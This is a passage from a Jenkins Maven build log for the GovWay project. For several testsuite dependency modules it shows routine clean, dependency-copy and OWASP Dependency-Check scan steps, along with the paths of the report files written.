/var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:45:12 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:45:12 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:45:12 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:45:12 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:45:12 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:45:12 [INFO] 17:45:12 [INFO] -----------< org.openspcoop2:org.openspcoop2.testsuite.test >----------- 17:45:12 [INFO] Building dependencies.testsuite.test 1.0 [45/67] 17:45:12 [INFO] from mvn/dependencies/testsuite/test/pom.xml 17:45:12 [INFO] --------------------------------[ pom ]--------------------------------- 17:45:12 [INFO] 17:45:12 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test --- 17:45:12 [INFO] Executing tasks 17:45:17 [INFO] Executed tasks 17:45:17 [INFO] 17:45:17 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test --- 17:45:17 [INFO] Checking for updates 17:45:17 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:45:17 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:45:17 [INFO] Check for updates complete (69 ms) 17:45:17 [INFO] 17:45:17 17:45:17 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:45:17 17:45:17 17:45:17 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:45:17 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:45:17 17:45:17 17:45:17 [INFO] Analysis Started 17:45:17 [INFO] Finished File Name Analyzer (0 seconds) 17:45:17 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:45:17 [INFO] Finished Hint Analyzer (0 seconds) 17:45:17 [INFO] Finished Version Filter Analyzer (0 seconds) 17:45:19 [INFO] Created CPE Index (1 seconds) 17:45:19 [INFO] Finished CPE Analyzer (1 seconds) 17:45:19 [INFO] Finished False Positive Analyzer (0 seconds) 17:45:19 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:45:19 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:45:19 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:45:19 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:45:19 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:45:19 [INFO] Analysis Complete (1 seconds) 17:45:19 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.xml 17:45:19 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.html 17:45:19 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.json 17:45:19 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.csv 17:45:19 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-report.sarif 17:45:19 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-jenkins.html 17:45:19 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-junit.xml 17:45:19 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/dependency-check-result/dependency-check-gitlab.json 17:45:19 [INFO] 17:45:19 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.testng >-------- 17:45:19 [INFO] Building dependencies.testsuite.test.testng 1.0 [46/67] 17:45:19 [INFO] from mvn/dependencies/testsuite/test/testng/pom.xml 17:45:19 [INFO] --------------------------------[ pom ]--------------------------------- 17:45:19 [INFO] 17:45:19 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.testng --- 17:45:19 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/testng (includes = [*.jar], excludes = []) 17:45:19 [INFO] 17:45:19 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.testng --- 17:45:19 [INFO] 17:45:19 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.testng --- 17:45:20 [INFO] Executing tasks 17:45:25 [INFO] Executed tasks 17:45:25 [INFO] 17:45:25 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.testng --- 17:45:25 [INFO] Checking for updates 17:45:25 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:45:25 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:45:25 [INFO] Check for updates complete (68 ms) 17:45:25 [INFO] 17:45:25 17:45:25 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:45:25 17:45:25 17:45:25 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:45:25 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:45:25 17:45:25 17:45:25 [INFO] Analysis Started 17:45:25 [INFO] Finished File Name Analyzer (0 seconds) 17:45:25 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:45:25 [INFO] Finished Hint Analyzer (0 seconds) 17:45:25 [INFO] Finished Version Filter Analyzer (0 seconds) 17:45:26 [INFO] Created CPE Index (1 seconds) 17:45:26 [INFO] Finished CPE Analyzer (1 seconds) 17:45:26 [INFO] Finished False Positive Analyzer (0 seconds) 17:45:26 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:45:26 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:45:26 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:45:26 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:45:26 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:45:26 [INFO] Analysis Complete (1 seconds) 17:45:26 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:45:26 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:45:26 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:45:26 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:45:26 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:45:26 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:45:26 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:45:26 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:45:27 [INFO] 17:45:27 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.junit4 >-------- 17:45:27 [INFO] Building dependencies.testsuite.test.junit4 1.0 [47/67] 17:45:27 [INFO] from mvn/dependencies/testsuite/test/junit4/pom.xml 17:45:27 [INFO] --------------------------------[ pom ]--------------------------------- 17:45:27 [INFO] 17:45:27 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.junit4 --- 17:45:27 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/junit4 (includes = [*.jar], excludes = []) 17:45:27 [INFO] 17:45:27 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.junit4 --- 17:45:27 [INFO] 17:45:27 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.junit4 --- 17:45:27 [INFO] Executing tasks 17:45:32 [INFO] Executed tasks 17:45:32 [INFO] 17:45:32 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.junit4 --- 17:45:32 [INFO] Checking for updates 17:45:32 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:45:32 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:45:32 [INFO] Check for updates complete (78 ms) 17:45:32 [INFO] 17:45:32 17:45:32 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:45:32 17:45:32 17:45:32 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:45:32 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:45:32 17:45:32 17:45:32 [INFO] Analysis Started 17:45:32 [INFO] Finished File Name Analyzer (0 seconds) 17:45:32 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:45:32 [INFO] Finished Hint Analyzer (0 seconds) 17:45:32 [INFO] Finished Version Filter Analyzer (0 seconds) 17:45:34 [INFO] Created CPE Index (1 seconds) 17:45:34 [INFO] Finished CPE Analyzer (2 seconds) 17:45:34 [INFO] Finished False Positive Analyzer (0 seconds) 17:45:34 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:45:34 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:45:34 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:45:34 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:45:34 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:45:34 [INFO] Analysis Complete (2 seconds) 17:45:34 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:45:34 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:45:34 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:45:34 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:45:34 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:45:34 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:45:34 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:45:34 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:45:34 [INFO] 17:45:34 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.karate09 >------- 17:45:34 [INFO] Building dependencies.testsuite.test.karate09 1.0 [48/67] 17:45:34 [INFO] from mvn/dependencies/testsuite/test/karate09/pom.xml 17:45:34 [INFO] --------------------------------[ pom ]--------------------------------- 17:45:34 [INFO] 17:45:34 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.karate09 --- 17:45:34 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/karate09 (includes = [*.jar], excludes = []) 17:45:34 [INFO] 17:45:34 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.karate09 --- 17:45:34 [INFO] 17:45:34 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.karate09 --- 17:45:34 [INFO] Executing tasks 17:45:39 [INFO] Executed tasks 17:45:39 [INFO] 17:45:39 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.karate09 --- 17:45:39 [INFO] Checking for updates 17:45:39 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:45:39 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:45:39 [INFO] Check for updates complete (113 ms) 17:45:40 [INFO] 17:45:40 17:45:40 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:45:40 17:45:40 17:45:40 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:45:40 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:45:40 17:45:40 17:45:40 [INFO] Analysis Started 17:45:40 [INFO] Finished File Name Analyzer (0 seconds) 17:45:40 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:45:40 [INFO] Finished Hint Analyzer (0 seconds) 17:45:40 [INFO] Finished Version Filter Analyzer (0 seconds) 17:45:41 [INFO] Created CPE Index (1 seconds) 17:45:41 [INFO] Finished CPE Analyzer (1 seconds) 17:45:41 [INFO] Finished False Positive Analyzer (0 seconds) 17:45:41 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:45:41 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:45:41 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:45:41 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:45:41 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:45:41 [INFO] Analysis Complete (1 seconds) 17:45:41 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:45:41 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:45:41 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:45:41 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:45:41 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:45:41 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:45:41 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:45:41 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:45:41 [INFO] 17:45:41 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.logback >------- 17:45:41 [INFO] Building dependencies.testsuite.test.logback 1.0 [49/67] 17:45:41 [INFO] from mvn/dependencies/testsuite/test/logback/pom.xml 17:45:41 [INFO] --------------------------------[ pom ]--------------------------------- 17:45:41 [INFO] 17:45:41 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.logback --- 17:45:41 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/logback (includes = [*.jar], excludes = []) 17:45:42 [INFO] 17:45:42 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.logback --- 17:45:42 [INFO] 17:45:42 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.logback --- 17:45:42 [INFO] Executing tasks 17:45:47 [INFO] Executed tasks 17:45:47 [INFO] 17:45:47 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.logback --- 17:45:47 [INFO] Checking for updates 17:45:47 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:45:47 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:45:47 [INFO] Check for updates complete (70 ms) 17:45:47 [INFO] 17:45:47 17:45:47 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:45:47 17:45:47 17:45:47 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:45:47 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:45:47 17:45:47 17:45:47 [INFO] Analysis Started 17:45:47 [INFO] Finished File Name Analyzer (0 seconds) 17:45:47 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:45:47 [INFO] Finished Hint Analyzer (0 seconds) 17:45:47 [INFO] Finished Version Filter Analyzer (0 seconds) 17:45:49 [INFO] Created CPE Index (1 seconds) 17:45:49 [INFO] Finished CPE Analyzer (1 seconds) 17:45:49 [INFO] Finished False Positive Analyzer (0 seconds) 17:45:49 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:45:49 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:45:49 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:45:49 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:45:49 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:45:49 [INFO] Analysis Complete (1 seconds) 17:45:49 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:45:49 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:45:49 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:45:49 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:45:49 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:45:49 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:45:49 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:45:49 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:45:49 [INFO] 17:45:49 [INFO] ------< org.openspcoop2:org.openspcoop2.testsuite.test.httpcore4 >------ 17:45:49 [INFO] Building dependencies.testsuite.test.httpcore4 1.0 [50/67] 17:45:49 [INFO] from mvn/dependencies/testsuite/test/httpcore4/pom.xml 17:45:49 [INFO] --------------------------------[ pom ]--------------------------------- 17:45:49 [INFO] 17:45:49 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.httpcore4 --- 17:45:49 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/httpcore4 (includes = [*.jar], excludes = []) 17:45:49 [INFO] 17:45:49 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.httpcore4 --- 17:45:49 [INFO] 17:45:49 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.httpcore4 --- 17:45:49 [INFO] Executing tasks 17:45:54 [INFO] Executed tasks 17:45:54 [INFO] 17:45:54 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.httpcore4 --- 17:45:54 [INFO] Checking for updates 17:45:54 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:45:54 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:45:54 [INFO] Check for updates complete (72 ms) 17:45:54 [INFO] 17:45:54 17:45:54 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:45:54 17:45:54 17:45:54 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:45:54 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:45:54 17:45:54 17:45:54 [INFO] Analysis Started 17:45:54 [INFO] Finished File Name Analyzer (0 seconds) 17:45:54 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:45:54 [INFO] Finished Hint Analyzer (0 seconds) 17:45:54 [INFO] Finished Version Filter Analyzer (0 seconds) 17:45:56 [INFO] Created CPE Index (1 seconds) 17:45:56 [INFO] Finished CPE Analyzer (1 seconds) 17:45:56 [INFO] Finished False Positive Analyzer (0 seconds) 17:45:56 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:45:56 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:45:56 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:45:56 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:45:56 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:45:56 [INFO] Analysis Complete (1 seconds) 17:45:56 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:45:56 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:45:56 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:45:56 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:45:56 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:45:56 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:45:56 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:45:56 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:45:56 [INFO] 17:45:56 [INFO] -------< org.openspcoop2:org.openspcoop2.testsuite.test.spring5 >------- 17:45:56 [INFO] Building dependencies.testsuite.test.spring5 1.0 [51/67] 17:45:56 [INFO] from mvn/dependencies/testsuite/test/spring5/pom.xml 17:45:56 [INFO] --------------------------------[ pom ]--------------------------------- 17:45:56 [INFO] 17:45:56 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.spring5 --- 17:45:56 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/spring5 (includes = [*.jar], excludes = []) 17:45:56 [INFO] 17:45:56 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.spring5 --- 17:45:56 [INFO] 17:45:56 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.spring5 --- 17:45:56 [INFO] Executing tasks 17:46:01 [INFO] Executed tasks 17:46:01 [INFO] 17:46:01 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.spring5 --- 17:46:01 [INFO] Checking for updates 17:46:01 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:46:01 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:46:01 [INFO] Check for updates complete (68 ms) 17:46:01 [INFO] 17:46:01 17:46:01 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:46:01 17:46:01 17:46:01 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:46:01 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:46:01 17:46:01 17:46:01 [INFO] Analysis Started 17:46:01 [INFO] Finished File Name Analyzer (0 seconds) 17:46:01 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:46:01 [INFO] Finished Hint Analyzer (0 seconds) 17:46:01 [INFO] Finished Version Filter Analyzer (0 seconds) 17:46:03 [INFO] Created CPE Index (1 seconds) 17:46:03 [INFO] Finished CPE Analyzer (1 seconds) 17:46:03 [INFO] Finished False Positive Analyzer (0 seconds) 17:46:03 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:46:03 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:46:03 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:46:03 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:46:03 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:46:03 [INFO] Analysis Complete (1 seconds) 17:46:03 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.xml 17:46:03 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.html 17:46:03 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.json 17:46:03 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.csv 17:46:03 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-report.sarif 17:46:03 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-jenkins.html 17:46:03 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-junit.xml 17:46:03 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependencies/testsuite/dependency-check-result/dependency-check-gitlab.json 17:46:03 [INFO] 17:46:03 [INFO] ----< org.openspcoop2:org.openspcoop2.testsuite.test.spring-ldap2 >----- 17:46:03 [INFO] Building dependencies.testsuite.test.spring-ldap2 1.0 [52/67] 17:46:03 [INFO] from mvn/dependencies/testsuite/test/spring-ldap2/pom.xml 17:46:03 [INFO] --------------------------------[ pom ]--------------------------------- 17:46:03 [INFO] 17:46:03 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.testsuite.test.spring-ldap2 --- 17:46:03 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/testsuite/spring-ldap2 (includes = [*.jar], excludes = []) 17:46:03 [INFO] 17:46:03 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.testsuite.test.spring-ldap2 --- 17:46:03 [INFO] 17:46:03 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.testsuite.test.spring-ldap2 --- 17:46:03 [INFO] Executing tasks 17:46:08 [INFO] Executed tasks 17:46:08 [INFO] 17:46:08 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.testsuite.test.spring-ldap2 --- 17:46:08 [INFO] Checking for updates 17:46:08 [INFO] Skipping the NVD API Update as it was 